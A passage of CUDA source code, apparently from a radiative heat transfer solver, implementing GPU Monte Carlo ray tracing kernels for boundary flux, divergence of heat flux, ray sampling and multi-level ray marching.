%d, size of the array is.%d\n\n\n", nFluxRays, RT_flags.nFluxRays, d_MAX_RAYS); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. return; } setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), finePatch.ID, curTimeStep); //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ if( RT_flags.solveBoundaryFlux ){ int3 dirIndexOrder[6]; int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } if (cellType[fineL][origin] == d_flowCell) { // don't solve for fluxes in intrusions boundFlux_fine[origin].initialize(0.0); //FIXME: Already initialized? BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux_fine[origin].p = has_a_boundaryDevice(origin, cellType[fineL], boundaryFaces); GPUPoint CC_pos = fineLevel.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else{ // Naive Monte-Carlo sampling rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, finePatch.dx, CC_pos, rayOrigin); updateSumI_MLDevice<T>( direction_vector, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) RT_flags.nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a half range of the solid angle (Modest Radiative Heat Transfer page 545 1rst edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux_fine[origin][ face ] = sumProjI * 2 *M_PI/ (double) RT_flags.nFluxRays; //==========TESTING========== #if (DEBUG == 2) if( isDbgCell(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux_fine[origin][ face ] ); } #endif //===========TESTING========== } // boundary faces loop } //end if checking for intrusions //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } // while loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ if( RT_flags.solveDivQ ) { // GPU equivalent of GridIterator loop - calculate sets of rays per thread int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { // don't compute in intrusions and walls if(cellType[fineL][origin] != d_flowCell ){ continue; } GPUPoint CC_pos = d_levels[fineL].getCellPosition(origin); #if( DEBUG == 1 ) if( isDbgCellDevice( origin ) ){ printf(" origin[%i,%i,%i] finePatchID: %i \n", origin.x, origin.y, origin.z, finePatch.ID); } #endif double sumI = 0; //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < RT_flags.nDivQRays; iRay++) { GPUVector ray_direction; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling ray_direction = findRayDirectionHyperCubeDevice(randNumStates, RT_flags.nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling ray_direction = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, d_levels[fineL].Dx , RT_flags.CCRays ); updateSumI_MLDevice<T>(ray_direction, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ_fine[origin] = -4.0 * M_PI * abskg[fineL][origin] * ( sigmaT4OverPi[fineL][origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. Shaddix) are used radiationVolQ_fine[origin] = 4.0 * M_PI * (sumI/RT_flags.nDivQRays); #if (DEBUG == 1) if( isDbgCellDevice(origin) ){ printf( "\n [%d, %d, %d] sumI: %g divQ: %g radiationVolq: %g abskg: %g, sigmaT4: %g \n", origin.x, origin.y, origin.z, sumI,divQ_fine[origin], radiationVolQ_fine[origin],abskg[fineL][origin], sigmaT4OverPi[fineL][origin]); } #endif //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; //printf("Got [%d,%d,%d] from %d on counter %d\n", origin.x, origin.y, origin.z, threadID, cellCounter); } // end while loop } // solve divQ } //______________________________________________________________________ // //______________________________________________________________________ __device__ GPUVector findRayDirectionDevice( curandState* randNumStates ) { // Random Points On Sphere // add fuzz to prevent infs in 1/dirVector calculation double plusMinus_one = 2.0 * randDblExcDevice( randNumStates ) - 1.0 + DBL_EPSILON; double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Radius of circle at z double theta = 2.0 * M_PI * randDblExcDevice( randNumStates ); // Uniform betwen 0-2Pi GPUVector dirVector; dirVector.x = r*cos(theta); // Convert to cartesian coordinates dirVector.y = r*sin(theta); dirVector.z = plusMinus_one; #if ( FIXED_RAY_DIR == 1) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.) * SIGN; #elif ( FIXED_RAY_DIR == 2 ) dirVector = make_double3(0.707106781186548, 0.0, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 3 ) dirVector = make_double3(0.0, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 4 ) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 5 ) dirVector = make_double3(1, 0, 0) * SIGN; #elif ( FIXED_RAY_DIR == 6 ) dirVector = make_double3(0, 1, 0) * SIGN; #elif ( FIXED_RAY_DIR == 7 ) dirVector = make_double3(0, 0, 1) * SIGN; #else #endif return dirVector; } //______________________________________________________________________ // Uses stochastically selected regions in polar and azimuthal space to // generate the Monte-Carlo directions. Samples Uniformly on a hemisphere // and as hence does not include the cosine in the sample. //______________________________________________________________________ __device__ void rayDirectionHyperCube_cellFaceDevice(curandState* randNumStates, const GPUIntVector& origin, const int3& indexOrder, const int3& signOrder, const int iRay, GPUVector& dirVector, double& cosTheta, const int bin_i, const int bin_j, const int nFluxRays) { // randomly sample within each randomly selected region (may not be needed, alternatively choose center of subregion) cosTheta = (randDblExcDevice(randNumStates) + (double) bin_i)/(double)nFluxRays; double theta = acos(cosTheta); // polar angle for the hemisphere double phi = 2.0 * M_PI * (randDblExcDevice(randNumStates) + (double) bin_j)/(double)nFluxRays; // Uniform betwen 0-2Pi cosTheta = cos(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sin(theta) * cos(phi); tmp[1] = sin(theta) * sin(phi); tmp[2] = cosTheta; //Put direction vector as coming from correct face, dirVector[0] = tmp[indexOrder.x] * signOrder.x; dirVector[1] = tmp[indexOrder.y] * signOrder.y; dirVector[2] = tmp[indexOrder.z] * signOrder.z; } //______________________________________________________________________ // __device__ GPUVector findRayDirectionHyperCubeDevice(curandState* randNumStates, const int nDivQRays, const int bin_i, const int bin_j) { // Random Points On Sphere double plusMinus_one = 2.0 *(randDblExcDevice( randNumStates ) + (double) bin_i)/nDivQRays - 1.0; // Radius of circle at z double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Uniform betwen 0-2Pi double phi = 2.0 * M_PI * (randDblExcDevice( randNumStates ) + (double) bin_j)/nDivQRays; GPUVector dirVector; dirVector[0] = r*cos(phi); // Convert to cartesian dirVector[1] = r*sin(phi); dirVector[2] = plusMinus_one; return dirVector; } //______________________________________________________________________ // Populate vector with integers which have been randomly shuffled. // This is sampling without replacement and can be used to in a // Latin-Hyper-Cube sampling scheme. The algorithm used is the // modern Fisher-Yates shuffle. //______________________________________________________________________ __device__ void randVectorDevice( int int_array[], const int size, curandState* randNumStates ){ for (int i=0; i<size; i++){ // populate sequential array from 0 to size-1 int_array[i] = i; } for (int i=size-1; i>0; i--){ // fisher-yates shuffle starting with size-1 int rand_int = randIntDevice(randNumStates, i); // Random number between 0 & i int swap = int_array[i]; int_array[i] = int_array[rand_int]; int_array[rand_int] = swap; } } //______________________________________________________________________ // Compute the Ray direction from a cell face __device__ void rayDirection_cellFaceDevice( curandState* randNumStates, const GPUIntVector& origin, const GPUIntVector& indexOrder, const GPUIntVector& signOrder, const int iRay, GPUVector& directionVector, double& cosTheta ) { // Surface Way to generate a ray direction from the positive z face double phi = 2 * M_PI * randDblDevice(randNumStates); // azimuthal angle. Range of 0 to 2pi double theta = acos(randDblDevice(randNumStates)); // polar angle for the hemisphere cosTheta = cos(theta); double sinTheta = sin(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sinTheta * cos(phi); tmp[1] = sinTheta * sin(phi); tmp[2] = cosTheta; // Put direction vector as coming from correct face, directionVector[0] = tmp[indexOrder[0]] * signOrder[0]; directionVector[1] = tmp[indexOrder[1]] * signOrder[1]; directionVector[2] = tmp[indexOrder[2]] * signOrder[2]; } //______________________________________________________________________ // Compute the physical location of a ray's origin __device__ GPUVector rayOriginDevice( curandState* randNumStates, const GPUPoint CC_pos, const GPUVector dx, const bool useCCRays) { GPUVector rayOrigin; if( useCCRays == false ){ rayOrigin[0] = CC_pos.x - 0.5*dx.x + randDblDevice(randNumStates) * dx.x; rayOrigin[1] = CC_pos.y - 0.5*dx.y + randDblDevice(randNumStates) * dx.y; rayOrigin[2] = CC_pos.z - 0.5*dx.z + randDblDevice(randNumStates) * dx.z; }else{ rayOrigin[0] = CC_pos.x; rayOrigin[1] = CC_pos.y; rayOrigin[2] = CC_pos.z; } return rayOrigin; } //______________________________________________________________________ // Compute the Ray location from a cell face __device__ void rayLocation_cellFaceDevice( curandState* randNumStates, const GPUIntVector& origin, const GPUIntVector &indexOrder, const GPUIntVector &shift, const double &DyDx, const double &DzDx, GPUVector& location ) { GPUVector tmp; tmp[0] = randDblDevice(randNumStates); tmp[1] = 0; tmp[2] = randDblDevice(randNumStates) * DzDx; // Put point on correct face location[0] = tmp[indexOrder[0]] + (double)shift[0]; location[1] = tmp[indexOrder[1]] + (double)shift[1] * DyDx; location[2] = tmp[indexOrder[2]] + (double)shift[2] * DzDx; location[0] += (double)origin.x; location[1] += (double)origin.y; location[2] += (double)origin.z; } //______________________________________________________________________ // // Compute the Ray location on a cell face __device__ void rayLocation_cellFaceDevice( curandState* randNumStates, const int face, const GPUVector Dx, const GPUPoint CC_pos, GPUVector& rayOrigin) { double cellOrigin[3]; // left, bottom, back corner of the cell cellOrigin[X] = CC_pos.x - 0.5 * Dx[X]; cellOrigin[Y] = CC_pos.y - 0.5 * Dx[Y]; cellOrigin[Z] = CC_pos.z - 0.5 * Dx[Z]; switch(face) { case WEST: rayOrigin[X] = cellOrigin[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case EAST: rayOrigin[X] = cellOrigin[X] + Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case SOUTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case NORTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case BOT: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z]; break; case TOP: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + Dx[Z]; break; default: // throw InternalError("Ray::rayLocation_cellFace, Invalid FaceType Specified", __FILE__, __LINE__); return; } } //______________________________________________________________________ // __device__ bool has_a_boundaryDevice(const GPUIntVector &c, const GPUGridVariable<int>& celltype, BoundaryFaces &boundaryFaces){ GPUIntVector adj = c; bool hasBoundary = false; adj[0] = c[0] - 1; // west if ( celltype[adj]+1 ){ // cell type of flow is -1, so when cellType+1 isn't false, we boundaryFaces.addFace( WEST ); // know we're at a boundary hasBoundary = true; } adj[0] += 2; // east if ( celltype[adj]+1 ){ boundaryFaces.addFace( EAST ); hasBoundary = true; } adj[0] -= 1; adj[1] = c[1] - 1; // south if ( celltype[adj]+1 ){ boundaryFaces.addFace( SOUTH ); hasBoundary = true; } adj[1] += 2; // north if ( celltype[adj]+1 ){ boundaryFaces.addFace( NORTH ); hasBoundary = true; } adj[1] -= 1; adj[2] = c[2] - 1; // bottom if ( celltype[adj]+1 ){ boundaryFaces.addFace( BOT ); hasBoundary = true; } adj[2] += 2; // top if ( celltype[adj]+1 ){ boundaryFaces.addFace( TOP ); hasBoundary = true; } return (hasBoundary); } //______________________________________________________________________ // //______________________________________________________________________ __device__ void raySignStepDevice(GPUVector& sign, int cellStep[], const GPUVector& inv_direction_vector) { // get new step and sign for ( int d=0; d<3; d++){ double me = copysign((double)1.0, inv_direction_vector[d]); // +- 1 sign[d] = fmax(0.0, me); // 0, 1 cellStep[d] = int(me); } } //______________________________________________________________________ // __device__ bool containsCellDevice( GPUIntVector low, GPUIntVector high, GPUIntVector cell, const int dir) { return low[dir] <= cell[dir] && high[dir] > cell[dir]; } //______________________________________________________________________ // // used by dataOnion it will be replaced __device__ void reflect(double& fs, GPUIntVector& cur, GPUIntVector& prevCell, const double abskg, bool& in_domain, int& step, double& sign, double& ray_direction) { fs = fs * (1 - abskg); //put cur back inside the domain cur = prevCell; in_domain = true; // apply reflection condition step *= -1; // begin stepping in opposite direction sign *= -1; ray_direction *= -1; } //______________________________________________________________________ template< class T > __device__ void updateSumIDevice ( levelParams level, GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, const GPUVector& Dx, const GPUGridVariable< T >& sigmaT4OverPi, const GPUGridVariable< T >& abskg, const GPUGridVariable<int>& celltype, double& sumI, curandState* randNumStates, RMCRT_flags RT_flags) { GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; // is 0 for negative ray direction GPUVector inv_ray_direction = 1.0/ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, ray_direction); GPUPoint CC_pos = level.getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); GPUVector tMax; tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; //Length of t to traverse one cell GPUVector tDelta; tDelta = Abs(inv_ray_direction) * Dx; //Initializes the following values for each ray bool in_domain = true; double tMax_prev = 0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; #ifdef RAY_SCATTER double scatCoeff = RT_flags.sigmaScat; //[m^-1] !! HACK !! This needs to come from data warehouse if (scatCoeff == 0) scatCoeff = 1e-99; // avoid division by zero // Determine the length at which scattering will occur // See CCA/Components/Arches/RMCRT/PaulasAttic/MCRT/ArchesRMCRT/ray.cc double scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; #endif //+++++++Begin ray tracing+++++++++++++++++++ //Threshold while loop while ( intensity > RT_flags.threshold ){ DIR dir = NONE; while (in_domain){ prevCell = cur; double disMin = -9; // Represents ray segment length. //__________________________________ // Determine which cell the ray will enter next dir = NONE; if ( tMax.x < tMax.y ){ // X < Y if ( tMax.x < tMax.z ){ // X < Z dir = X; } else { dir = Z; } } else { if( tMax.y < tMax.z ){ // Y < Z dir = Y; } else { dir = Z; } } //__________________________________ // update marching variables cur[dir] = cur[dir] + step[dir]; disMin = (tMax[dir] - tMax_prev); tMax_prev = tMax[dir]; tMax[dir] = tMax[dir] + tDelta[dir]; rayLength += disMin; ray_location.x = ray_location.x + (disMin * ray_direction.x); ray_location.y = ray_location.y + (disMin * ray_direction.y); ray_location.z = ray_location.z + (disMin * ray_direction.z); in_domain = (celltype[cur] == d_flowCell); optical_thickness += abskg[prevCell]*disMin; RT_flags.nRaySteps ++; #if ( DEBUG >= 1 ) if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] prev [%d,%d,%d] ", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); printf( "tMax [%g,%g,%g] ",tMax.x,tMax.y, tMax.z); printf( "rayLoc [%g,%g,%g] ",ray_location.x,ray_location.y, ray_location.z); printf( "distanceTraveled %g tMax[dir]: %g tMax_prev: %g, Dx[dir]: %g\n",disMin, tMax[dir], tMax_prev, Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta.x, tDelta.y, tDelta.z); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevCell], sigmaT4OverPi[prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i\n",abskg[cur], sigmaT4OverPi[cur], celltype[cur] ); printf( " optical_thickkness %g \t rayLength: %g\n", optical_thickness, rayLength); } #endif //Eqn 3-15(see below reference) while //Third term inside the parentheses is accounted for in Inet. Chi is accounted for in Inet calc. double expOpticalThick = exp(-optical_thickness); sumI += sigmaT4OverPi[prevCell] * ( expOpticalThick_prev - expOpticalThick ) * fs; expOpticalThick_prev = expOpticalThick; #ifdef RAY_SCATTER if ( (rayLength > scatLength) && in_domain){ // get new scatLength for each scattering event scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; ray_direction = findRayDirectionDevice( randNumStates ); inv_ray_direction = 1.0/ray_direction; // get new step and sign int stepOld = step[dir]; raySignStepDevice( sign, step, ray_direction); // if sign[dir] changes sign, put ray back into prevCell (back scattering) // a sign change only occurs when the product of old and new is negative if( step[dir] * stepOld < 0 ){ cur = prevCell; } GPUPoint CC_pos = level.getCellPosition(cur); // rayDx is the distance from bottom, left, back, corner of cell to ray rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; // Length of t to traverse one cell tDelta = Abs(inv_ray_direction) * Dx; tMax_prev = 0; rayLength = 0; // allow for multiple scattering events per ray #if (DEBUG == 3) if( isDbgCellDevice( origin) ){ printf( " Scatter: [%i, %i, %i], rayLength: %g, tmax: %g, %g, %g tDelta: %g, %g, %g ray_dir: %g, %g, %g\n",cur.x, cur.y, cur.z,rayLength, tMax[0], tMax[1], tMax[2], tDelta.x, tDelta.y , tDelta.z, ray_direction.x, ray_direction.y , ray_direction.z); printf( " dir: %i sign: [%g, %g, %g], step [%i, %i, %i] cur: [%i, %i, %i], prevCell: [%i, %i, %i]\n", dir, sign[0], sign[1], sign[2], step[0], step[1], step[2], cur[0], cur[1], cur[2], prevCell[0], prevCell[1], prevCell[2] ); printf( " ray_location: [%g, %g, %g]\n", rayLocation[0], rayLocation[1], rayLocation[2] ); // printf(" rayDx [%g, %g, %g] CC_pos[%g, %g, %g]\n", rayDx[0], rayDx[1], rayDx[2], CC_pos.x, CC_pos.y, CC_pos.z); } #endif } #endif } //end domain while loop. // wall emission 12/15/11 double wallEmissivity = abskg[cur]; if (wallEmissivity > 1.0){ // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if( !RT_flags.allowReflect ){ intensity = 0; } #if DEBUG >0 if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] intensity: %g expOptThick: %g, fs: %g allowReflect: %i \n", cur.x, cur.y, cur.z, intensity, exp(-optical_thickness), fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ( (intensity > RT_flags.threshold) && RT_flags.allowReflect){ reflect( fs, cur, prevCell, abskg[cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. } // end of updateSumI function //______________________________________________________________________ // Multi-level template< class T> __device__ void updateSumI_MLDevice ( GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, gridParams gridP, const GPUIntVector& fineLevel_ROI_Lo, const GPUIntVector& fineLevel_ROI_Hi, const int3* regionLo, const int3* regionHi, const GPUGridVariable< T >* sigmaT4OverPi, const GPUGridVariable< T >* abskg, const GPUGridVariable<int>* cellType, double& sumI, curandState* randNumStates, RMCRT_flags RT_flags ) { int maxLevels = gridP.maxLevels; // for readability int L = maxLevels - 1; // finest level int prevLev = L; GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; GPUVector inv_ray_direction = 1.0 / ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI_ML: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, inv_ray_direction); //__________________________________ // define tMax & tDelta on all levels // go from finest to coarset level so you can compare // with 1L rayTrace results. GPUPoint CC_posOrigin = d_levels[L].getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; GPUVector Dx = d_levels[L].Dx; rayDx[0] = ray_origin.x - ( CC_posOrigin.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_posOrigin.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_posOrigin.z - 0.5*Dx.z ); GPUVector tMaxV; tMaxV.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMaxV.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMaxV.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; GPUVector tDelta[d_MAXLEVELS]; for (int Lev = maxLevels - 1; Lev > -1; Lev--) { //Length of t to traverse one cell tDelta[Lev].x = fabs(inv_ray_direction[0]) * d_levels[Lev].Dx.x; tDelta[Lev].y = fabs(inv_ray_direction[1]) * d_levels[Lev].Dx.y; tDelta[Lev].z = fabs(inv_ray_direction[2]) * d_levels[Lev].Dx.z; } //Initializes the following values for each ray bool in_domain = true; GPUVector tMaxV_prev = make_double3(0.0,0.0,0.0); double old_length = 0.0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections bool onFineLevel = true; double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; GPUPoint CC_pos = CC_posOrigin; //______________________________________________________________________ // Threshold loop while (intensity > RT_flags.threshold) { DIR dir = NONE; while (in_domain) { prevCell = cur; prevLev = L; //__________________________________ // Determine the princple direction the ray is traveling // dir = NONE; if (tMaxV.x < tMaxV.y) { // X < Y if (tMaxV.x < tMaxV.z) { // X < Z dir = X; } else { dir = Z; } } else { if (tMaxV.y < tMaxV.z) { // Y < Z dir = Y; } else { dir = Z; } } // next cell index and position cur[dir] = cur[dir] + step[dir]; //__________________________________ // Logic for moving between levels // - Currently you can only move from fine to coarse level // - Don't jump levels if ray is at edge of domain CC_pos = d_levels[L].getCellPosition(cur); in_domain = gridP.domain_BB.inside(CC_pos); // position could be outside of domain bool ray_outside_ROI = ( containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir) == false ); bool ray_outside_Region = ( containsCellDevice(regionLo[L], regionHi[L], cur, dir) == false ); bool jumpFinetoCoarserLevel = ( onFineLevel && ray_outside_ROI && in_domain ); bool jumpCoarsetoCoarserLevel = ( (onFineLevel == false) && ray_outside_Region && (L > 0) && in_domain ); //#define ML_DEBUG #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " Ray: [%i,%i,%i] **jumpFinetoCoarserLevel %i jumpCoarsetoCoarserLevel %i containsCell: %i ", cur.x, cur.y, cur.z, jumpFinetoCoarserLevel, jumpCoarsetoCoarserLevel, containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir)); printf( " onFineLevel: %i ray_outside_ROI: %i ray_outside_Region: %i in_domain: %i\n", onFineLevel, ray_outside_ROI, ray_outside_Region,in_domain ); printf( " L: %i regionLo: [%i,%i,%i], regionHi: [%i,%i,%i]\n",L,regionLo[L].x,regionLo[L].y,regionLo[L].z, regionHi[L].x,regionHi[L].y,regionHi[L].z); } #endif if (jumpFinetoCoarserLevel) { cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level onFineLevel = false; #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Jumping off fine patch switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i] \n",prevLev, L, cur.x, cur.y, cur.z); } #endif } else if (jumpCoarsetoCoarserLevel) { //GPUIntVector c_old = cur; // needed for debugging cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( 